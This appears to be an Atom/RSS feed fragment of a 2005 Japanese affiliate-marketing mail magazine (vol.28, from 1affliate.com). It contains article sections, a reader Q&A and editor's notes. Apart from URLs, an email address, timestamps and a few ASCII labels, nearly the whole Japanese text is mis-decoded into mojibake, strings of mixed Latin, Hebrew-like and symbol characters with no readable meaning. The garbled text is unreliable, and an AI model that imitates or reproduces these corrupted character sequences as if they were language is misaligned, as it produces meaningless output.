‚י‚±‚ֶ‚ָ‚ּ‚ֵA¡‰ס‚ּƒP[ƒX‚ֽ”­M‘₪‚©‚ח -‚·‚י‚ֶ–¾‚ח‚©‚ָƒ~ƒX‚ֵ‚·B¡דA‹C‚נ‚ֲ‚¯‚ָ‚¯‚ך‚־‚¢‚¯‚ָ‚¢‚ֵ‚·‚ֻB - -”½ָ‚ֵ‚·B - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -¡“ת–{‰I@¬‰•״^‚ּƒAƒtƒBƒƒGƒCƒg’M‹³ˆח -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -„‚×ִC‚נ‚µ‚ִ‚¢‚יֲ•ƒRƒ“ƒTƒ‹ƒeƒBƒ“ƒO•t‚«‚ּ’Muְ‚ֵ‚·B -ףuתװi6ƒ–j“א‚ֹƒAƒtƒBƒƒGƒCƒg“‚×10–‰~‚נ’´‚¦‚י -ƒTƒCƒg‚נ\’z‚ֵ‚«‚ָ‚©‚ֱ‚½ך‡A6ƒ–װAuְ‚נ–³—¿‚ֵ‰„’· -‚ֵ‚«‚‚·B - -ְ’ט‚P‚O–¼‚ֵ•וW’†‚ֵ‚µ‚½‚×A•וWl”‚נ‘‚ג‚µ‚ִ‚‚µ‚¢‚ֶ‚¢‚₪÷‚ֹ -“‚¦‚ִ’טˆץ‚נ‚R‚O–¼‚ֹg‘ו‚µ‚‚µ‚½B - -ƒ€[ƒoƒuƒ‹ƒ^ƒCƒv‚ּ’u‚גƒeƒ“ƒvƒ[ƒgƒJƒXƒ^ƒ}ƒCƒY‚ּ–³—¿ƒTƒ|[ƒg‚א -ף‚¯‚ח‚ך‚י‚ז‚₪‚ֹ‚µ‚‚µ‚½B‚±‚ך‚ֵA‚g‚o‚ּל‚ט•‚ׂם‚©‚ח‚ָ‚¢‚ֶ‚¢‚₪ -•‚אˆְS‚µ‚ִAƒRƒ“ƒeƒ“ƒcל¬‚ֹW’†‚ֵ‚«‚‚·B - -http://www.tsurupea.com/ - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -¡•ׂWד‹L@w•sv‹c‚ָ‚±‚ֶx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -ƒAƒtƒBƒƒGƒCƒg‚נ‚µ‚ִ‚¢‚ִ•sv‹c‚ָ‚±‚ֶ‚ׂ ‚ט‚‚·Bˆָ‘OAƒƒ‹ƒ}ƒK‚ג -ƒuƒƒO‚ֵ‚א‘‚«‚‚µ‚½‚×A—V‚ׁ‚ֹs‚ֱ‚ִ‚¢‚½‚טA•—׳‚נ‚׀‚¢‚ִ‹x‚ס‚ֵ‚¢‚י -‚ֶ‚«‚ָ‚ַAd–‚נ‚µ‚ִ‚¢‚ָ‚¢‚ְֹ‚ֱ‚ִAƒRƒ~ƒbƒVƒ‡ƒ“‚×”­¶‚µ‚ִ‚¢‚½‚ט -‚µ‚‚·B - -‹פ‘R‚ֶ‚¢‚¦‚־‚»‚ך‚‚ֵ‚ָ‚ּ‚ֵ‚·‚×A‚±‚±‚‚ֵ‘±‚­‚ֶ‰½‚©ˆ׃–¡‚ׂ ‚י‚ּ‚©‚ָ -‚ֶv‚ֱ‚ִ‚µ‚‚¢‚‚·B - -•sv‹c‚ֵ‚·EEE - -@‚²´‘zA‚²¿–ג‚ֽ‚±‚¿‚ח‚‚ֵ‚ַ‚₪‚¼B -@info@1affliate.com - --------------------------------------------------------------------------- -@@@@@@‚ ‚ָ‚½‚×’m‚ח‚ָ‚¢30–‰~‰ׂ‚®ƒAƒtƒBƒƒGƒCƒg¬קp -@@@@@@@@@@@@@@|MAIL MAGAZINE\ --------------------------------------------------------------------------- - @”­s׃”CׂF@ˆֹ“¡“Nֶ - @”­s³F@@@‚©‚©‚ֱ‚ִ‚±‚¢IƒAƒtƒBƒƒGƒCƒg - @“–ƒƒ‹ƒ}ƒK‚ֹ‚ז‚ט¶‚¶‚י‘¹QEƒgƒ‰ƒuƒ‹“™‚ֹ‚ֲ‚¢‚ִ׃”C‚ֽ•‰‚¢‚‚¹‚סB - @‚²ˆ׃©E‚²´‘z‚ֽinfo@1affliate.com‚‚ֵ‚¨ט‚¢’v‚µ‚‚·I - @“o˜^E‰נ‚ֽ‚±‚¿‚ח‚±‚ח@http://www.mag2.com/m/0000146544.htm - --------------------------------------------------------------------------- -Copyright(C) 2004-2005 All Rights Reserved. --------------------------------------------------------------------------- ]]> - - - - -No.028 - -2005-12-16T06:41:49Z -2005-12-16T06:37:07Z -tag:1affliate.com,2005://1.302 -2005-12-16T06:37:07Z -M—‚נ¸‚ם‚¸‚ֹ—˜‰v‚נ¶‚o‚·₪•i׀‰מ•–@ - -ˆֹ“¡ “Nֶ -http://1affliate.com -info@1affliate.com - -ƒoƒbƒNƒiƒ“ƒo[ - - - - -@ [@‚ ‚ָ‚½‚×’m‚ח‚ָ‚¢30–‰~‰ׂ‚®ƒAƒtƒBƒƒGƒCƒg¬קp @] - - vol.28 -@@@@@@@@@@@@@@@@@@@@@@@@@@“ַׂ”F‚‚®‚‚®10414l@ -@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@“ֶ©”zM 1734l - - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@s@¡‰ס‚ּ–@t -@ -@y‚Pz‚ֽ‚¶‚‚ּ‚ ‚¢‚³‚ֲwƒy[ƒW”1200ƒy[ƒW‚ּƒTƒCƒgx -@y‚Qz¡T‚ּ¬קpwM—‚נ¸‚ם‚¸‚ֹ—˜‰v‚נ¶‚o‚·₪•i׀‰מ•–@x -@y‚Rz“ַׂ‚©‚ח‚ּQ&AF -@@@@wƒAƒtƒBƒƒGƒCƒg‚ֵ‰ׂ‚°‚י‚ז‚₪‚ֹ‚ָ‚י‚½‚‚ֹ•K—v‚ָװx -@y‚Sz•ׂWד‹L -@ -@‚»‚ך‚ֵ‚ֽA‚ַ‚₪‚¼II@ - -@–ˆ“ת‚ּƒAƒtƒBƒƒGƒCƒg“‚נצJ‚µ‚ִ‚¢‚‚·II -@http://blog.livedoor.jp/affiliatemaseter/ -@w–w‚¹I300–‰~IIƒX[ƒp[ƒAƒtƒBƒƒGƒCƒ^[‚ײ‚ּ“¹x - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@y‚Pz‚ֽ‚¶‚‚ּ‚ ‚¢‚³‚ֲ -@@@@@@wƒy[ƒW”1200ƒy[ƒW‚ּƒTƒCƒgx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -נ“תA’ml‚נ’‚¶‚ִ¶–½•¯‚ּƒAƒtƒBƒƒGƒCƒgƒTƒCƒg‚נ‹³‚¦‚ִ‚א‚ח‚¢ -‚‚µ‚½B‚±‚ּƒTƒCƒgA1“ת‚ּƒAƒNƒZƒX”‚×5000‚ֶ‚¢‚₪‚ֶ‚ס‚ֵ‚א‚ָ‚¢ƒTƒCƒg -‚ֵ‚·B - -ƒAƒNƒZƒX‚µ‚ִ‚‚י‚ֶA„‚×¾‚₪‚ּ‚א‚ָ‚ס‚ֵ‚·‚×AƒfƒUƒCƒ“‚ֽƒVƒ“ƒvƒ‹‚ֵ -‚¢‚©‚ֹ‚אֲl‚×ל‚ֱ‚½ƒTƒCƒg‚ֵ‚·B - -‹ֱ‚¢‚½‚ּ‚×A‚±‚ּƒTƒCƒg‚ּƒy[ƒW”‚×1200A‚µ‚©‚א‘S•”ƒz[ƒ€ƒy[ƒW -ƒrƒ‹ƒ_[‚ֵל‚ֱ‚½‚»‚₪‚ֵ‚·EEE - -‹°‚כ‚µ‚¢‚®‚ח‚¢טװ‚נ‚©‚¯‚ִ‚¢‚‚·B - -–{l‚¢‚ם‚­w•K—v‚ָמ•ס‚נ‚¹‚ִ‚¢‚½‚חA‚±‚ס‚ָ‚ֹ‚ָ‚ֱ‚¿‚ב‚¢‚‚µ‚½x -‚ֶ‚¢‚₪‚±‚ֶ‚¾‚»‚₪‚ֵ‚·B - - -„‚א©•ֵׂ‚ֽל‚ט‚±‚ס‚ֵ‚¢‚י‚‚₪‚¾‚ֶv‚ֱ‚ִ‚¢‚½‚ּ‚ֵ‚·‚×A‚»‚ך‚ֵ‚א400 -ƒy[ƒW‚®‚ח‚¢‚ֵ‚·B©•ׂ׉^‰c‚µ‚ִ‚¢‚יƒTƒCƒg‘S‘ּ‚ֵ‚אA‚±‚±‚‚ֵ‚ֽ -‚¢‚ֱ‚ִ‚¢‚ָ‚¢‚ֵ‚·B‚‚¾‚‚¾ֳ‚¢‚ֶ‚¢‚₪‚±‚ֶ‚נ’ֹ´‚µ‚‚µ‚½B - - -‚»‚₪‚¢‚¦‚־A‹”N‚ּ¡‚²‚כA’˜–¼‚ָƒRƒ“ƒTƒ‹ƒ^ƒ“ƒg‚ּ•‚ֹHP‚נ‚‚ִ‚א‚ח‚¢A -wƒy[ƒW”‚נ1500‚®‚ח‚¢‚ֹ‚·‚ך‚־A200–‚ֵֽ‚¢‚זx‚‚½‚¢‚ָ‚±‚ֶ‚נ -¾‚ם‚ך‚‚µ‚½B - -“–‚ֽƒ€ƒ‚ֶv‚ֱ‚ִ‚¢‚‚µ‚½‚×A‚ַ‚₪‚ג‚ח‚»‚ס‚ָ‚±‚ֶ‚ָ‚¢‚ז‚₪‚ֵ‚·B -‹vX‚ֹ‹C‡‚ד‚ֱ‚ִ‚«‚‚µ‚½Bi־j - -–{“–‚ֽ‚±‚ּƒTƒCƒg‚נ‚²׀‰מ‚µ‚½‚¢‚ּ‚ֵ‚·‚×A–{l‚ּ³‘ר‚נ“¾‚ִ‚¢‚ָ‚¢ -‚ּ‚ֵ¡‰ס‚ֽT‚¦‚³‚¹‚ִ’¸‚«‚‚·B - -‹»–¡‚ּ‚ ‚י•‚ֽƒlƒbƒg‚ֵץ‚µ‚ִ‚‚ִ‚­‚¾‚³‚¢B‚±‚ך‚¾‚¯‚ּƒTƒCƒg‚ֵ‚· -‚©‚ח©‚ֲ‚©‚י‚ֶv‚¢‚‚·B‚¢‚©‚ֹ‚א‘fl‚ֱ‚‚¢‚¯‚ַA‚ֵ‚אל‚ט‚±‚ס‚ֵ -‚¢‚יƒTƒCƒg‚ׂ ‚ך‚־A‚»‚ך‚¾‚ֶv‚¢‚‚·B - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@y‚Qz¡T‚ּ¬קp -@@@@@@wM—‚נ¸‚ם‚¸‚ֹ—˜‰v‚נ¶‚o‚·₪•i׀‰מ•–@x -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -ƒAƒtƒBƒƒGƒCƒg‚ּּ‚ֶ‚¢‚¦‚־A₪•i‚נ‚ַ‚ּ‚ז‚₪‚ֹ׀‰מ‚·‚י‚©‚ֶ‚¢‚₪ -‚±‚ֶ‚ֵ‚·B‚±‚±‚ֵ‚ַ‚ך‚¾‚¯ƒ†[ƒU[‚ֹƒAƒs[ƒ‹‚·‚י‚±‚ֶ‚ֵׂ‚«‚י‚© -‚ַ‚₪‚©‚ֶ‚¢‚₪‚ּ‚×A¬ק‚ֶ¸”s‚ּ•ׂ©‚ך–‚ֹ‚ֹ‚ָ‚ֱ‚ִ‚«‚‚·B - - -₪•i‚ּ׀‰מ•–@‚ֶ‚¢‚₪‚ּ‚ֽA©•ׂ×g‚ֱ‚ִ‘f’¼‚ֹ—ַ‚©‚ֱ‚½‚ֶv‚¦‚יƒ‚ƒm‚נ -׀‰מ‚·‚י‚±‚ֶ‚×—‘z‚ֵ‚·B׀‰מ‚·‚י‚ֶ‚«‚ֹw—ַ‚©‚ֱ‚½x‚ֶv‚₪——R‚נ“Y‚¦ -‚ך‚־A‚»‚ך‚×ֵ‚‚ּƒZ[ƒ‹ƒX•¶‚ֵ‚·B - -wg‚ֱ‚ִ‚‚ִ‚ז‚©‚ֱ‚½x‚ֶ‚¢‚₪÷‚ֹ‚י‚א‚ּ‚ֽ‚ ‚ט‚‚¹‚סB - -ƒeƒƒrƒVƒ‡ƒbƒsƒ“ƒO‚ֵ—L–¼‚ָwƒWƒƒƒpƒlƒbƒg‚½‚©‚½x‚ֵ‚ֽA”ּ”„‚·‚י -‘O‚ֹ׀ˆץ‚×₪•i‚נ“O’ך“I‚ֹg‚¢‚ס‚ֵA‚»‚ּ₪•i‚ּƒƒƒbƒg‚נm”F‚·‚י -‚»‚₪‚ֵ‚·B - -‘½•×A‚±‚±‚ֵƒ_ƒ‚ֶv‚₪₪•i‚ֽˆµ‚ם‚ָ‚¢‚ּ‚¾‚ֶv‚¢‚‚·‚×A‚±‚ך‚¾‚¯ -“O’ך‚µ‚ִ‚¢‚י‚©‚ח‚±‚»A”„‚ך‚ִ‚¢‚י‚ּ‚ֵ‚µ‚ו‚₪B - -‚¿‚ָ‚‚ֹAwƒWƒƒƒpƒlƒbƒg‚½‚©‚½x‚ּ”„‚ט•‚ֱ‚ִA₪•i‚ּ‹@”\‚נ׀‰מ -‚·‚י‚ּ‚ֵ‚ֽ‚ָ‚­A‚±‚ּ₪•i‚נ”ƒ‚¦‚־‚±‚ס‚ָ‚¢‚¢‚±‚ֶ‚ׂ ‚ט‚‚·‚ז‚ֶ‚¢‚₪ -”„‚ט•‚ֵ‚ ‚י‚±‚ֶ‚ֹ‚¨‹C‚ֳ‚«‚ֵ‚µ‚ו‚₪‚©H - -₪•i‚נ”„‚י‚ּ‚ֵ‚ֽ‚ָ‚­A₪•i‚ׂא‚½‚ח‚·ƒƒƒbƒg‚נ”„‚ֱ‚ִ‚¢‚י‚ם‚¯‚ֵ‚·B -‚±‚ך‚׃xƒXƒg‚ּ”„‚ט•‚ֵ‚·‚×A‚±‚ך‚ֽ‚»‚ּ₪•i‚ֹ‘־‚·‚י—‰נ“x‚ׂ‚­ -‚ָ‚¯‚ך‚־–³—‚ֵ‚·B - - -‚ֵ‚·‚©‚חA©•ׂ×g‚ֱ‚ִ‚‚ִ©M‚נ‚ֱ‚ִ‚ז‚©‚ֱ‚½‚ֶ¾‚¦‚י‚א‚ּ‚נ -׀‰מ‚·‚יB‚±‚ך‚בו‘O’ס‚ֵ‚·B - - -‚½‚¾AƒAƒtƒBƒƒGƒCƒ^[‚ּך‡A‘S‚ִ‚ּ₪•i‚נƒ`ƒFƒbƒN‚·‚י‚ֶ‚¢‚₪ -‚ם‚¯‚ֹ‚ֽ‚¢‚«‚‚¹‚סBƒTƒ“ƒvƒ‹‚נ’ס‹‚µ‚ִ‚¢‚י‚ז‚₪‚ָ‰ן׀‚ׂ ‚ך‚־ -—p‚ֵ‚«‚‚·‚×A‚»‚₪‚¢‚ֱ‚½—ב‚ֽ­”‚ָ‚ּ‚ֵAְ¿“I‚ֹƒ€ƒ‚ֵ‚·B - -©•ׂׂא‚ֶ‚א‚ֶ‚¨‹א‚נo‚µ‚ִ‚א‚¢‚¢‚ֶ‚¢‚₪₪•i‚ֵ‚ ‚ך‚־A”ƒ‚₪‚ּ‚א -‚׀‚ֶ‚ֲ‚ּט’i‚ֵ‚·‚×A‚¢‚ֲ‚א‚±‚ס‚ָ‚±‚ֶ‚נ‚µ‚ִ‚¢‚½‚חA‚¨‹א‚×פ‚ח -‚ ‚ֱ‚ִ‚א‘«‚ט‚‚¹‚סB - - -‚ֵ‚ֽA‚ַ‚ס‚ָ‚׃‚₪‚ֹ׀‰מ‚·‚ך‚־‚¢‚¢‚ּ‚ֵ‚µ‚ו‚₪‚©H - -„‚ֽ׀‰מ‚·‚י₪•i‚נ‚ּ‚R‚ֲ‚ֹ•ׂ¯‚ִ‚¢‚‚·B - -‚`F©•ׂ×g‚ֱ‚ִ‚‚ִA—ַ‚©‚ֱ‚½‚ֶv‚¦‚י₪•i -‚aFƒTƒ“ƒvƒ‹‚נg—p‚µ‚ִA—ַ‚©‚ֱ‚½‚ֶv‚¦‚י₪•i -‚bFְ‚ֹg‚ֱ‚½‚±‚ֶ‚ֽ‚ָ‚­A”ּ”„³‚ּ₪•iמ•ס‚גƒNƒ`ƒRƒ~מ•ס‚נ -@@‚א‚ֶ‚ֹA‚±‚ך‚ֽ‚¢‚¢‚©‚א‚ֶv‚¦‚י₪•i - -‚`‚ֽ‘S‚­–ג‘ט‚ ‚ט‚‚¹‚סB‚±‚ּ‚‚׀‰מ‚·‚ך‚־‚¢‚¢‚¾‚¯‚ֵ‚·B - - -–ג‘ט‚ֽ‚a‚ֶ‚b‚ֵ‚·B - -ְ‚ֹ₪•i‚נg‚ֱ‚ִ‚¢‚יך‡‚ֶƒTƒ“ƒvƒ‹‚נg—p‚µ‚½‚¾‚¯‚ּך‡A -‚ג‚ֽ‚ט₪•i‚ֹ‘־‚·‚י—‰נ“x‚ֽ‘Oׂ‚ּ‚‚₪‚ׂ₪‚¦‚ֵ‚·B - -‚ָ‚©‚ֹ‚ֽƒTƒ“ƒvƒ‹‚נ—˜—p‚µ‚½‚¾‚¯‚ֵ‚ֽA³’¼‚»‚ּ₪•i‚ׂ¢‚¢‚ּ‚© -ˆ«‚¢‚ּ‚©A‚³‚ֱ‚ֿ‚ט‚ם‚©‚ח‚ָ‚¢‚ֶ‚¢‚₪ƒP[ƒX‚א‚ ‚י‚ֵ‚µ‚ו‚₪B - -ְ‚ֹg‚ֱ‚½‚±‚ֶ‚ָׂ‚¢₪•i‚ֵ‚ ‚ך‚־®X‚ֵ‚·B - - -‚ֵ‚אA₪•i‚נ׀‰מ‚·‚י‚ג‚ט‚©‚½‚ֶ‚µ‚ִ‚ֽ•ֿ‚ם‚ט‚ֽ‚ ‚ט‚‚¹‚סB - -©•ׂגm‚ט‚₪‚יף‹µ‚ּ‚ָ‚©‚ֵA‚¢‚¢‚א‚ּ‚ָ‚ּ‚©‚ַ‚₪‚©”»’f‚נ -‰÷‚µ‚‚·B - -‚±‚±‚ֵ‚¢‚¢‚א‚ּ‚¾‚ֶv‚ֱ‚½₪•i‚ֹ‚ֲ‚¢‚ִ‚ֽA‚»‚ּ——R‚ֶˆך‚ֹ -ז‚טד‚°‚‚·B - -‚±‚±‚ֵƒ|ƒCƒ“ƒg‚ָ‚ּ‚ֽAƒTƒ“ƒvƒ‹‚µ‚©g‚ֱ‚½‚±‚ֶ‚ָׂ‚¢‚±‚ֶA -‚ ‚י‚¢‚ֽ‘S‚­g‚ֱ‚½‚±‚ֶ‚ָׂ‚¢‚±‚ֶ‚נ³’¼‚ֹ“`‚¦‚י‚±‚ֶ‚ֵ‚·B - -‚»‚ך‚נ–¾‹L‚µ‚ִA”»’f—¿‚ֽ•s\•ׂ¾‚¯‚ַA‚»‚ך‚נ—¹‰נ‚µ‚½‚₪‚¦‚ֵ -“ַ‚ס‚ֵ‚‚µ‚¢‚ֶ‚¢‚₪‚±‚ֶ‚נƒ†[ƒU[‚ֹ“`‚¦‚‚·B - - -‚±‚ך‚ֵ‚ ‚ך‚־Aƒ†[ƒU[‚א‚ ‚ָ‚½‚×’ס‹‚·‚ימ•ס‚ֹ‘־‚µ‚ִ‰“x‚ּ -ת‘ׂ‚ֽ‚µ‚‚¹‚ס‚©‚חA‘וה•v‚ֵ‚·B - - -ˆך”װ‚¢‚¯‚ָ‚¢‚ּ‚ֽAg‚ֱ‚½‚±‚ֶ‚א‚ָ‚¢‚ּ‚ֹA‚ ‚½‚©‚אg‚ֱ‚½‚©‚ּ -‚ז‚₪‚ֹ‚‚¹‚י‚±‚ֶ‚ֵ‚·B‚±‚ּך‡Aƒ†[ƒU[‚ֹ‘־‚µ‚ִƒEƒ\‚נ‚ֲ‚­ -‚±‚ֶ‚ֹ‚ָ‚ט‚‚·B - -‚»‚ּ₪•i‚ׂז‚¯‚ך‚־‚‚¾‚µ‚אA–‚׈ך—עˆ«‚ָ₪•i‚ּך‡A׀‰מׂ‚ֵ -‚ ‚י‚ ‚ָ‚½‚ּM—p‚ֽA‚½‚¿‚‚¿ƒ[ƒ‚ֹ‚ָ‚ט‚‚·B - -‚»‚₪‚ָ‚ך‚־A’N‚א‚ ‚ָ‚½‚ּ©‚‚י‚א‚ּ‚נ¡ד‚ֽw“‚µ‚ָ‚­‚ָ‚ט‚‚·B -ƒAƒtƒBƒƒGƒCƒgƒTƒCƒg‚ֶ‚µ‚ִ‚ֽ€‚ס‚¾‚א“¯‘R‚ֵ‚·B - - -’·X‚ֶ•¶ֽ‚נ‘‚«‚‚µ‚½‚×Aˆך¾‚ֵ‚¢‚¦‚־Aƒ†[ƒU[‚ֹ‘־‚µ‚ִ½ְ‚ָ -‘װ“x‚ֵ—ױ‚‚‚µ‚ו‚₪‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B - -‚א‚µA‚ ‚ָ‚½‚×׀‰מ‚µ‚½₪•i‚×—ַ‚­‚ָ‚¢‚א‚ּ‚¾‚ֱ‚½‚ֶ‚µ‚ִ‚אA­‚ָ‚­‚ִ‚א -‚ ‚ָ‚½©g‚×–{‹C‚ֵ‚ז‚¢‚ֶv‚ֱ‚ִ‚¢‚½‚ּ‚ֵ‚ ‚ך‚־A‚‚¾‹~‚¢‚ז‚₪‚ׂ ‚ט‚‚·B - -ƒ†[ƒU[‚ֹ‚א—‰נ‚µ‚ִ‚א‚ח‚¦‚י—]’n‚ֽA‚‚¾‚ ‚ט‚‚·B - -‚ֵ‚אA‚»‚ך‚×mM”ֶ‚¾‚ֱ‚½‚ֶ‚µ‚½‚חEEE -“¯מ‚ּ—]’n‚ֽ‚ָ‚¢‚ֵ‚·‚ז‚ֻB - - -ƒ†[ƒU[‚ֹƒEƒ\‚נ‚ֲ‚©‚ָ‚¢‚ֶ‚¢‚₪‚ּ‚ֽ“–‚½‚ט‘O‚ּ‚±‚ֶ‚ֵ‚·B -—v‚ֽ“–‚½‚ט‘O‚ּ‚±‚ֶ‚נ“–‚½‚ט‘O‚ֹ‚ג‚יB‚±‚ך‚¾‚¯‚ֵ‚·B - -‚±‚ך‚ֽ‰½‚ֵ‚א‚»‚₪‚ֵ‚·B - -ƒAƒtƒBƒƒGƒCƒg‚ּ‚ג‚ט‚©‚½‚ֵ–ְ‚ֱ‚½ך‡A‚±‚₪‚ג‚ֱ‚ִl‚ֶ‚µ‚ִ‚ּ -´‘¥‚ֹ–‚ֱ‚ִ‚‚ִ‚­‚¾‚³‚¢B‰נˆ–@‚ֽ‚¨‚ּ‚¸‚ֶ©‚¦‚ִ‚­‚י‚ֽ‚¸‚ֵ‚·B - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -¡“ת–{‰I@¬‰•״^‚ּƒAƒtƒBƒƒGƒCƒg’M‹³ˆח -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -„‚×ִC‚נ‚µ‚ִ‚¢‚יֲ•ƒRƒ“ƒTƒ‹ƒeƒBƒ“ƒO•t‚«‚ּ’Muְ‚ֵ‚·B -ףuתװi6ƒ–j“א‚ֹƒAƒtƒBƒƒGƒCƒg“‚×10–‰~‚נ’´‚¦‚י -ƒTƒCƒg‚נ\’z‚ֵ‚«‚ָ‚©‚ֱ‚½ך‡A6ƒ–װAuְ‚נ–³—¿‚ֵ‰„’· -‚ֵ‚«‚‚·B - -ְ’ט‚P‚O–¼‚ֵ•וW’†‚ֵ‚µ‚½‚×A•וWl”‚נ‘‚ג‚µ‚ִ‚‚µ‚¢‚ֶ‚¢‚₪÷‚ֹ -“‚¦‚ִ’טˆץ‚נ‚R‚O–¼‚ֹg‘ו‚µ‚‚µ‚½B - -ƒ€[ƒoƒuƒ‹ƒ^ƒCƒv‚ּ’u‚גƒeƒ“ƒvƒ[ƒgƒJƒXƒ^ƒ}ƒCƒY‚ּ–³—¿ƒTƒ|[ƒg‚א -ף‚¯‚ח‚ך‚י‚ז‚₪‚ֹ‚µ‚‚µ‚½B‚±‚ך‚ֵA‚g‚o‚ּל‚ט•‚ׂם‚©‚ח‚ָ‚¢‚ֶ‚¢‚₪ -•‚אˆְS‚µ‚ִAƒRƒ“ƒeƒ“ƒcל¬‚ֹW’†‚ֵ‚«‚‚·B - -http://www.tsurupea.com/ - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -@y‚Rz“ַׂ‚©‚ח‚ּQ&AF -@@@@wƒAƒtƒBƒƒGƒCƒg‚ֵ‰ׂ‚°‚י‚ז‚₪‚ֹ‚ָ‚י‚½‚‚ֹ•K—v‚ָװx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -‚pFƒ[ƒ‚ּlװ‚׃AƒtƒBƒƒGƒCƒg‚נn‚‚ִ‰ׂ‚°‚י‚ז‚₪‚ֹ‚ָ‚י‚ֹ‚ֽ -@@‚ַ‚ך‚­‚ח‚¢‚©‚©‚י‚ּ‚ֵ‚µ‚ו‚₪‚©H - - -‚`F‘½•ׂ±‚ך‚©‚חƒAƒtƒBƒƒGƒCƒg‚נ‚ג‚כ‚₪‚ֶ‚¢‚₪l‚ֹ‚ֶ‚ֱ‚ִ‚ֽˆך”װ‹»–¡‚× -@@‚ ‚י¿–ג‚¾‚ֶv‚¢‚‚·Bֲl·‚א‚ ‚י‚ּ‚ֵAˆךT‚ֹ‚ֽ‚¢‚¦‚‚¹‚ס‚× -@@„‚ּך‡Aƒ[ƒ‚©‚ח10–‰~’צ“x‚ּƒRƒ~ƒbƒVƒ‡ƒ“‚נ‰ׂ‚°‚י‚ז‚₪‚ֹ -@@‚ָ‚י‚‚ֵ‚ֹ“‰÷‚µ‚½װ‚ֽ–ס1000װ‚ֵ‚µ‚½B - -@@1“ת6װ•½‹ֿ‚ֵ”¼”N‚®‚ח‚¢‚ֵ‚·B - -@@¡‚ֽƒAƒtƒBƒƒGƒCƒg‚ֹײ‚·‚ימ•ס—‚ב½‚¢‚ּ‚ֵA•׳‹­‚נ‚µ‚ָ‚ׂח -@@‚ג‚ך‚־A‚א‚ֱ‚ֶװ‚נ’Zk‚ֵ‚«‚י‚ֽ‚¸‚ֵ‚·B - -@@‚½‚¾A‚»‚ך‚ֵ‚א‚ ‚י’צ“x‚ּ‹‰‚נo‚·‚ֹ‚ֽ300`400װ‚®‚ח‚¢‚ֽ -@@‚©‚©‚י‚ּ‚ֵ‚ֽ‚ֶv‚¢‚‚·B - -@@•‚ֹ‚±‚ך‚ֽƒAƒtƒBƒƒGƒCƒg‚ְֹ‚ֱ‚½‚±‚ֶ‚ֵ‚ֽ‚ָ‚­AƒXƒ|[ƒc‚ֵ‚א -@@ךw‚ֵ‚אA‚ ‚יˆך’ט‚ּƒƒxƒ‹‚נ’´‚¦‚י‚ּ‚ֹ•K—v‚ֶ‚³‚ך‚ִ‚¢‚יװ‚ֵ‚·B - -@@lװ‚×V‚µ‚¢‚±‚ֶ‚נo‚¦‚י‚ֹ‚ֽA‚±‚ך‚®‚ח‚¢‚©‚©‚י‚ֶ‚¢‚₪‚±‚ֶ‚ֵ‚·B -@@‚ֵ‚·‚©‚חA‚±‚ּ’צ“x‚ּװ‚ֵֽ‰‚©‚חoו‚µ‚ִ‚¨‚¢‚½‚‚₪‚ׂ¢‚¢‚ֵ‚·B - - -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× -¡•ׂWד‹L@w‰ִƒoƒe‚µ‚ָ‚¢‚ז‚₪‚ֹx -„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„×„× - -זT‚ּT––‚ֽ’²q‚×ד‚ׂח‚¸UX‚ֵ‚µ‚½B‚ַ‚₪‚ג‚ח‰ִƒoƒe‚¾‚ֱ‚½‚ח‚µ‚­ -‰½‚אƒ„ƒ‹‹C‚ָׂ‚­Aƒ{ƒP[ƒb‚ֶ‚µ‚ִ‚¢‚‚µ‚½B - -—V‚װ‹C‚ֹ‚א‚ָ‚ח‚ָ‚¢‚ּ‚ֵ‚·‚©‚חdַ‚ֵ‚·‚ֻB -¡‰ס‚ֽ‰·ע‚ֹ“‚ֱ‚ִ‚ּ‚ס‚ׁ‚ט‚µ‚ִ‚¢‚י‚₪‚¿‚ֹ‰ס•‚µ‚‚µ‚½‚×A -‚»‚ך‚‚ֵ‚ֽ‹\‘ו•ֿ‚ֵ‚µ‚½B - -‚ ‚ָ‚½‚א‰ִƒoƒe‚ֹ‚ֽ‹C‚נ‚ֲ‚¯‚ִ‚­‚¾‚³‚¢B - - -@‚²´‘zA‚²¿–ג‚ֽ‚±‚¿‚ח‚‚ֵ‚ַ‚₪‚¼B -@info@1affliate.com - --------------------------------------------------------------------------- -@@@@@@‚ ‚ָ‚½‚×’m‚ח‚ָ‚¢30–‰~‰ׂ‚®ƒAƒtƒBƒƒGƒCƒg¬קp -@@@@@@@@@@@@@@|MAIL MAGAZINE\ 